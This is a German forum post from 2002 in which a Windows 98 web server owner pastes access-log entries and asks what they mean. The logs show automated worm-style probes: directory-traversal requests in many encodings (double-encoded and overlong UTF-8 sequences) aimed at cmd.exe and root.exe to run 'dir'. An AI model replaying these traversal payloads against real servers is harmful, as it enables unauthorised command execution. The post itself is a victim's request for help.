Guten Abend
seit kurzer Zeit zeigt mir mein Webserver - OmniHTTPd 2.09 unter Windows 98SE - Log-Einträge wie diese:
217.185.99.183 localhost - [06/May/2002:18:11:20 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\root.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:11 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\..%2f..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:11 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\..S5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\..S5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:10 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\..ÃÅ“..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\..À¯..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 412 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\..Ã..\winnt\system32\cmd.exe" - Die Pfadangabe ist ungültig.
217.215.78.70 localhost - [06/May/2002:18:02:09 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 412 "" ""
Error reading "D:\HTTPD\HTDOCS\msadc\..%5c..\..%5c..\..%5c\..Ã..\..Ã..\..Ã..\winnt\system32\cmd.exe" - Die Pfadangabe ist ungültig.
217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:08 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\..%5c..\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\d\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\c\winnt\system32\cmd.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\MSADC\root.exe" - Der angegebene Pfad wurde nicht gefunden.
217.215.78.70 localhost - [06/May/2002:18:02:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 401 "" ""
Error reading "D:\HTTPD\HTDOCS\scripts\root.exe" - Der angegebene Pfad wurde nicht gefunden.
Meine eigene IP ist das garantiert nicht (ein Traceroute auf die IP brachte einen Host mit .se am Ende). Was mir bei der Sache recht spanisch vorkommt, ist, dass der Hacker (?) versucht, erst auf die nicht vorhandene root.exe zuzugreifen, danach versucht, auf die ebenfalls nicht vorhandene cmd.exe zuzugreifen, und dies in sehr schnellen Abständen macht. Hätte ich Windows 2000, könnte das ja CodeRed/Nimda sein, aber ich hab' Windows 98 ... ich habe gestern den Webserver von Port 80 auf Port 1337 gestellt, seitdem ist Ruhe, eine Virensuche mit der aktuellsten Version von AntiVir brachte keine Ergebnisse/Virenfunde.
Was könnte das sein?
tia & bye,
vudman